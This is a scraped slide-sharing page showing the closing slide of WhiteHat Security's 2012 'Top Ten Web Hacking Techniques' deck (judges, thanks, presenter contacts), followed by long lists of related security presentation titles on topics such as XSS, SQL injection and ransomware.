  Thai Duong, took the #1 spot 3 years in a row (BEAST in 2011 and
  Padding Oracle in 2010). Web security community respects deep
  technical research.
• Attack and Researcher Diversity: In 2012 we saw attack techniques
  focused on encryption, HTML5 / client-side, mobile, infrastructure
  server-side, intranet, session state, etc. The range of expertise to keep
  up with all the new cutting-edge research is at the very least, a full-time
  job. And the researchers themselves are located across the globe.



© 2013 WhiteHat Security, Inc.                                              80

Recommended for you

All these vulnerabilities, rarely matter
All these vulnerabilities, rarely matterAll these vulnerabilities, rarely matter
All these vulnerabilities, rarely matter

There is a serious misalignment of interests between Application Security vulnerability assessment vendors and their customers. Vendors are incentivized to report everything they possible can, even issues that rarely matter. On the other hand, customers just want the vulnerability reports that are likely to get them hacked. Every finding beyond that is a waste of time, money, and energy, which is precisely what’s happening every day.

application securitydastremediation rates
How to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare SectorHow to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare Sector

This document provides an analysis of the attack surface for 19 major healthcare organizations based on data collected by Bit Discovery from public sources on the internet. It includes statistics on each organization's total assets, domain names, cloud assets, use of content delivery networks, certificate authorities, expired certificates, geographic distribution, private IP addresses, WordPress vulnerabilities, and recommendations for building a security program around mapping the attack surface.

attack surface managementhealthcaresecurity
The Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare IndustryThe Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare Industry

Paubox SECURE @ Home 2020 Virtual Healthcare Cybersecurity & Innovation Conference October 21 - 22, 2020 https://www.paubox.com/blog/jeremiah-grossman-confirmed-to-speak-at-paubox-secure/ https://try.paubox.com/paubox-secure-2020

asset inventoryattack surfacesecurity
Thank you to…

 • All Web security researchers
 • Panel of Judges: Ryan Barnett, Robert Auger, Robert Hansen (CEO, Falling Rock
   Networks) Dinis Cruz, Jeff Williams (CEO, Aspect Security), Peleus Uhley, Romain
   Gaucher (Lead Researcher, Coverity), Giorgio Maone, Chris Wysopal, Troy
   Hunt, Ivan Ristic (Director of Engineering, Qualys), and Steve Christey (MITRE)
 • Everyone in the Web security community who assisted with voting




JEREMIAH GROSSMAN                       MATT JOHANSEN
Founder and CTO                         Head of the Threat Research Center

Twitter: @jeremiahg                     Twitter: @mattjay
Email: jeremiah@whitehatsec.com         Email: matt@whitehatsec.com

More Related Content

What's hot

XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
Yurii Bilyk
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
n|u - The Open Security Community
 
Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)
Daniel Tumser
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protection
amiable_indian
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
Amit Tyagi
 
Xss (cross site scripting)
Xss (cross site scripting)Xss (cross site scripting)
Xss (cross site scripting)
vinayh.vaghamshi _
 
Xss ppt
Xss pptXss ppt
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Shreeraj Shah
 
Network Security Nmap N Nessus
Network Security Nmap N NessusNetwork Security Nmap N Nessus
Network Security Nmap N Nessus
Utkarsh Verma
 
WannaCry ransomware attack
WannaCry ransomware attackWannaCry ransomware attack
WannaCry ransomware attack
Abdelhakim Salama
 
Cross Site Scripting: Prevention and Detection(XSS)
Cross Site Scripting: Prevention and Detection(XSS)Cross Site Scripting: Prevention and Detection(XSS)
Cross Site Scripting: Prevention and Detection(XSS)
Aman Singh
 
XSS- an application security vulnerability
XSS-   an application security vulnerabilityXSS-   an application security vulnerability
XSS- an application security vulnerability
Soumyasanto Sen
 
Cross Site Scripting(XSS)
Cross Site Scripting(XSS)Cross Site Scripting(XSS)
Cross Site Scripting(XSS)
Nabin Dutta
 
Windows Security Crash Course
Windows Security Crash CourseWindows Security Crash Course
Windows Security Crash Course
UTD Computer Security Group
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
Vishal Kumar
 
XSS
XSSXSS
Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...
Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...
Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...
Ajin Abraham
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
Дмитрий Бумов
 
Eternal blue Vulnerability
Eternal blue VulnerabilityEternal blue Vulnerability
Eternal blue Vulnerability
kandelrc
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)
Manish Kumar
 

What's hot (20)

XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protection
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
Xss (cross site scripting)
Xss (cross site scripting)Xss (cross site scripting)
Xss (cross site scripting)
 
Xss ppt
Xss pptXss ppt
Xss ppt
 
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
 
Network Security Nmap N Nessus
Network Security Nmap N NessusNetwork Security Nmap N Nessus
Network Security Nmap N Nessus
 
WannaCry ransomware attack
WannaCry ransomware attackWannaCry ransomware attack
WannaCry ransomware attack
 
Cross Site Scripting: Prevention and Detection(XSS)
Cross Site Scripting: Prevention and Detection(XSS)Cross Site Scripting: Prevention and Detection(XSS)
Cross Site Scripting: Prevention and Detection(XSS)
 
XSS- an application security vulnerability
XSS-   an application security vulnerabilityXSS-   an application security vulnerability
XSS- an application security vulnerability
 
Cross Site Scripting(XSS)
Cross Site Scripting(XSS)Cross Site Scripting(XSS)
Cross Site Scripting(XSS)
 
Windows Security Crash Course
Windows Security Crash CourseWindows Security Crash Course
Windows Security Crash Course
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
 
XSS
XSSXSS
XSS
 
Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...
Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...
Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
 
Eternal blue Vulnerability
Eternal blue VulnerabilityEternal blue Vulnerability
Eternal blue Vulnerability
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)
 

Viewers also liked

5 Proven Strategies for Working Capital
5 Proven Strategies for Working Capital5 Proven Strategies for Working Capital
5 Proven Strategies for Working Capital
Tradeshift
 
Internet banking safeguards vulnerabilities - OWASP AppSec EU 2016
Internet banking safeguards vulnerabilities - OWASP AppSec EU 2016Internet banking safeguards vulnerabilities - OWASP AppSec EU 2016
Internet banking safeguards vulnerabilities - OWASP AppSec EU 2016
SecuRing
 
Cyber war a threat to indias homeland security 2015
Cyber war a threat to indias homeland security 2015Cyber war a threat to indias homeland security 2015
Cyber war a threat to indias homeland security 2015
Ajay Serohi
 
Content Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooContent Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at Yahoo
Binu Ramakrishnan
 
Hacking
HackingHacking
Hacking
Haider Akbar
 
Owasp summit 2017
Owasp summit 2017 Owasp summit 2017
Owasp summit 2017
Dinis Cruz
 
National cyber security policy 2013
National cyber security policy  2013National cyber security policy  2013
National cyber security policy 2013
M P Keshava
 
Indian perspective of cyber security
Indian perspective of cyber securityIndian perspective of cyber security
Indian perspective of cyber security
Aurobindo Nayak
 
Ethical hacking presentation
Ethical hacking presentationEthical hacking presentation
Ethical hacking presentation
Georgekutty Francis
 
Best Practices in Auditing ISO/IEC 27001
Best Practices in Auditing ISO/IEC 27001Best Practices in Auditing ISO/IEC 27001
Best Practices in Auditing ISO/IEC 27001
PECB
 
Best practices and Government role in Cyber Security
Best practices and Government role in Cyber Security Best practices and Government role in Cyber Security
Best practices and Government role in Cyber Security
USAID CEED II Project Moldova
 
Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016
Jeremiah Grossman
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
Neel Kamal
 
ethical hacking in the modern times
ethical hacking in the modern timesethical hacking in the modern times
ethical hacking in the modern times
jeshin jose
 
Ethical hacking presentation
Ethical hacking presentationEthical hacking presentation
Ethical hacking presentation
Suryansh Srivastava
 
Hacking ppt
Hacking pptHacking ppt
Hacking ppt
giridhar_sadasivuni
 
Cyber security presentation
Cyber security presentationCyber security presentation
Cyber security presentation
Bijay Bhandari
 
Cybercrime.ppt
Cybercrime.pptCybercrime.ppt
Cybercrime.ppt
Aeman Khan
 
Hacking & its types
Hacking & its typesHacking & its types
Hacking & its types
Sai Sakoji
 
Cyber crime and security ppt
Cyber crime and security pptCyber crime and security ppt
Cyber crime and security ppt
Lipsita Behera
 

Viewers also liked (20)

5 Proven Strategies for Working Capital
5 Proven Strategies for Working Capital5 Proven Strategies for Working Capital
5 Proven Strategies for Working Capital
 
Internet banking safeguards vulnerabilities - OWASP AppSec EU 2016
Internet banking safeguards vulnerabilities - OWASP AppSec EU 2016Internet banking safeguards vulnerabilities - OWASP AppSec EU 2016
Internet banking safeguards vulnerabilities - OWASP AppSec EU 2016
 
Cyber war a threat to indias homeland security 2015
Cyber war a threat to indias homeland security 2015Cyber war a threat to indias homeland security 2015
Cyber war a threat to indias homeland security 2015
 
Content Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooContent Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at Yahoo
 
Hacking
HackingHacking
Hacking
 
Owasp summit 2017
Owasp summit 2017 Owasp summit 2017
Owasp summit 2017
 
National cyber security policy 2013
National cyber security policy  2013National cyber security policy  2013
National cyber security policy 2013
 
Indian perspective of cyber security
Indian perspective of cyber securityIndian perspective of cyber security
Indian perspective of cyber security
 
Ethical hacking presentation
Ethical hacking presentationEthical hacking presentation
Ethical hacking presentation
 
Best Practices in Auditing ISO/IEC 27001
Best Practices in Auditing ISO/IEC 27001Best Practices in Auditing ISO/IEC 27001
Best Practices in Auditing ISO/IEC 27001
 
Best practices and Government role in Cyber Security
Best practices and Government role in Cyber Security Best practices and Government role in Cyber Security
Best practices and Government role in Cyber Security
 
Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
 
ethical hacking in the modern times
ethical hacking in the modern timesethical hacking in the modern times
ethical hacking in the modern times
 
Ethical hacking presentation
Ethical hacking presentationEthical hacking presentation
Ethical hacking presentation
 
Hacking ppt
Hacking pptHacking ppt
Hacking ppt
 
Cyber security presentation
Cyber security presentationCyber security presentation
Cyber security presentation
 
Cybercrime.ppt
Cybercrime.pptCybercrime.ppt
Cybercrime.ppt
 
Hacking & its types
Hacking & its typesHacking & its types
Hacking & its types
 
Cyber crime and security ppt
Cyber crime and security pptCyber crime and security ppt
Cyber crime and security ppt
 

Similar to Top Ten Web Hacking Techniques of 2012

Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008
Jeremiah Grossman
 
White paper screen
White paper screenWhite paper screen
White paper screen
eltincho89
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
Brad Hill
 
A security note for web developers
A security note for web developersA security note for web developers
A security note for web developers
John Ombagi
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
Brad Hill
 
XST - Cross Site Tracing
XST - Cross Site TracingXST - Cross Site Tracing
XST - Cross Site Tracing
Magno Logan
 
Web Application Scanning 101
Web Application Scanning 101Web Application Scanning 101
Web Application Scanning 101
Sasha Nunke
 
Web Apps Security
Web Apps SecurityWeb Apps Security
Web Apps Security
Victor Bucutea
 
Top 10 Web Hacks 2013
Top 10 Web Hacks 2013Top 10 Web Hacks 2013
Top 10 Web Hacks 2013
Matt Johansen
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)
Jeremiah Grossman
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
Jay Nagar
 
XCS110_All_Slides.pdf
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdf
ssuser01066a
 
4.Xss
4.Xss4.Xss
4.Xss
phanleson
 
Hacking intranet websites
Hacking intranet websitesHacking intranet websites
Hacking intranet websites
shehab najjar
 
Web Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security ForgotWeb Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security Forgot
Jeremiah Grossman
 
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
RootedCON
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
Jeremiah Grossman
 
Securing TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography APISecuring TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography API
Kevin Hakanson
 
Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)
Stormpath
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
amiable_indian
 

Similar to Top Ten Web Hacking Techniques of 2012 (20)

Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008
 
White paper screen
White paper screenWhite paper screen
White paper screen
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
A security note for web developers
A security note for web developersA security note for web developers
A security note for web developers
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
XST - Cross Site Tracing
XST - Cross Site TracingXST - Cross Site Tracing
XST - Cross Site Tracing
 
Web Application Scanning 101
Web Application Scanning 101Web Application Scanning 101
Web Application Scanning 101
 
Web Apps Security
Web Apps SecurityWeb Apps Security
Web Apps Security
 
Top 10 Web Hacks 2013
Top 10 Web Hacks 2013Top 10 Web Hacks 2013
Top 10 Web Hacks 2013
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
 
XCS110_All_Slides.pdf
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdf
 
4.Xss
4.Xss4.Xss
4.Xss
 
Hacking intranet websites
Hacking intranet websitesHacking intranet websites
Hacking intranet websites
 
Web Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security ForgotWeb Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security Forgot
 
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
 
Securing TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography APISecuring TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography API
 
Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 

More from Jeremiah Grossman

All these vulnerabilities, rarely matter
All these vulnerabilities, rarely matterAll these vulnerabilities, rarely matter
All these vulnerabilities, rarely matter
Jeremiah Grossman
 
How to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare SectorHow to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare Sector
Jeremiah Grossman
 
The Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare IndustryThe Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare Industry
Jeremiah Grossman
 
Exploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash ScreensExploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash Screens
Jeremiah Grossman
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
Jeremiah Grossman
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
Jeremiah Grossman
 
Next Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers GuideNext Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers Guide
Jeremiah Grossman
 
Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?
Jeremiah Grossman
 
Ransomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to KnowRansomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to Know
Jeremiah Grossman
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years
Jeremiah Grossman
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years
Jeremiah Grossman
 
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Jeremiah Grossman
 
WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015
Jeremiah Grossman
 
No More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security GuaranteesNo More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security Guarantees
Jeremiah Grossman
 
WhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report ExplainedWhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report Explained
Jeremiah Grossman
 
WhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics ReportWhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics Report
Jeremiah Grossman
 
Million Browser Botnet
Million Browser BotnetMillion Browser Botnet
Million Browser Botnet
Jeremiah Grossman
 
WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)
Jeremiah Grossman
 
WhiteHat’s 12th Website Security Statistics [Full Report]
WhiteHat’s 12th Website Security Statistics [Full Report]WhiteHat’s 12th Website Security Statistics [Full Report]
WhiteHat’s 12th Website Security Statistics [Full Report]
Jeremiah Grossman
 
Web Breaches in 2011-“This is Becoming Hourly News and Totally Ridiculous"
Web Breaches in 2011-“This is Becoming Hourly News and Totally Ridiculous"Web Breaches in 2011-“This is Becoming Hourly News and Totally Ridiculous"
Web Breaches in 2011-“This is Becoming Hourly News and Totally Ridiculous"
Jeremiah Grossman
 

More from Jeremiah Grossman (20)

All these vulnerabilities, rarely matter
All these vulnerabilities, rarely matterAll these vulnerabilities, rarely matter
All these vulnerabilities, rarely matter
 
How to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare SectorHow to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare Sector
 
The Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare IndustryThe Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare Industry
 
Exploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash ScreensExploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash Screens
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
 
Next Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers GuideNext Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers Guide
 
Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?
 
Ransomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to KnowRansomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to Know
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years
 
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
 
WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015
 
No More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security GuaranteesNo More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security Guarantees
 
WhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report ExplainedWhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report Explained
 
WhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics ReportWhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics Report
 
Million Browser Botnet
Million Browser BotnetMillion Browser Botnet
Million Browser Botnet
 
WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)
 
WhiteHat’s 12th Website Security Statistics [Full Report]
WhiteHat’s 12th Website Security Statistics [Full Report]WhiteHat’s 12th Website Security Statistics [Full Report]
WhiteHat’s 12th Website Security Statistics [Full Report]
 
Web Breaches in 2011-“This is Becoming Hourly News and Totally Ridiculous"
Web Breaches in 2011-“This is Becoming Hourly News and Totally Ridiculous"Web Breaches in 2011-“This is Becoming Hourly News and Totally Ridiculous"
Web Breaches in 2011-“This is Becoming Hourly News and Totally Ridiculous"
 

Recently uploaded

Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...
Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...
Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...
Chris Swan
 
TrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-In
TrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-InTrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-In
TrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-In
TrustArc
 
論文紹介:A Systematic Survey of Prompt Engineering on Vision-Language Foundation ...
論文紹介:A Systematic Survey of Prompt Engineering on Vision-Language Foundation ...論文紹介:A Systematic Survey of Prompt Engineering on Vision-Language Foundation ...
論文紹介:A Systematic Survey of Prompt Engineering on Vision-Language Foundation ...
Toru Tamaki
 
How RPA Help in the Transportation and Logistics Industry.pptx
How RPA Help in the Transportation and Logistics Industry.pptxHow RPA Help in the Transportation and Logistics Industry.pptx
How RPA Help in the Transportation and Logistics Industry.pptx
SynapseIndia
 
Pigging Solutions Sustainability brochure.pdf
Pigging Solutions Sustainability brochure.pdfPigging Solutions Sustainability brochure.pdf
Pigging Solutions Sustainability brochure.pdf
Pigging Solutions
 
Paradigm Shifts in User Modeling: A Journey from Historical Foundations to Em...
Paradigm Shifts in User Modeling: A Journey from Historical Foundations to Em...Paradigm Shifts in User Modeling: A Journey from Historical Foundations to Em...
Paradigm Shifts in User Modeling: A Journey from Historical Foundations to Em...
Erasmo Purificato
 
What’s New in Teams Calling, Meetings and Devices May 2024
What’s New in Teams Calling, Meetings and Devices May 2024What’s New in Teams Calling, Meetings and Devices May 2024
What’s New in Teams Calling, Meetings and Devices May 2024
Stephanie Beckett
 
20240702 Présentation Plateforme GenAI.pdf
20240702 Présentation Plateforme GenAI.pdf20240702 Présentation Plateforme GenAI.pdf
20240702 Présentation Plateforme GenAI.pdf
Sally Laouacheria
 
Scaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - Mydbops
Scaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - MydbopsScaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - Mydbops
Scaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - Mydbops
Mydbops
 
Mitigating the Impact of State Management in Cloud Stream Processing Systems
Mitigating the Impact of State Management in Cloud Stream Processing SystemsMitigating the Impact of State Management in Cloud Stream Processing Systems
Mitigating the Impact of State Management in Cloud Stream Processing Systems
ScyllaDB
 
BLOCKCHAIN FOR DUMMIES: GUIDEBOOK FOR ALL
BLOCKCHAIN FOR DUMMIES: GUIDEBOOK FOR ALLBLOCKCHAIN FOR DUMMIES: GUIDEBOOK FOR ALL
BLOCKCHAIN FOR DUMMIES: GUIDEBOOK FOR ALL
Liveplex
 
Cookies program to display the information though cookie creation
Cookies program to display the information though cookie creationCookies program to display the information though cookie creation
Cookies program to display the information though cookie creation
shanthidl1
 
